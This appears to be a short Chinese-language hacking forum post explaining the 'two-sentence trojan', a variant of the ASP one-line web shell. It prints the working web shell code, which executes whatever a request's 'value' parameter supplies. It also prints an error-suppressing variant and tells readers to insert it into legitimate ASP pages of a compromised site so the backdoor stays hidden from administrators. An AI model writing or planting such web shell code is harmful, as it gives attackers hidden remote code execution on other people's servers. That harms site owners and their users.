这里说的两句话木马其实是一句话木马的变形,

一句话木马服务端原型:<%execute request("value")%> ,

变形后:<%On Error Resume Next execute request("value")%> ,

至于为什么要用两句话木马呢,是由于使我们的后门更加隐蔽.

我也试过用一句话插入WellShell的某个ASP文件里面,可是访问时经常出错,而插入两句话木马服务端却可以正常访问了,对站点的页面无任何影响.

这样就达到了隐蔽性更强的目的了,他管理员总不会连自己的网页文件都删了吧.

现在我的WellShell都有这样的后门.选择要插入两句话木马的ASP文件要注意,选一些可以用IE访问的ASP文件,不要选conn.asp这样的文件来插入.

当然,连接两句话木马的客户端仍然是用一句木马的客户端,不用修改.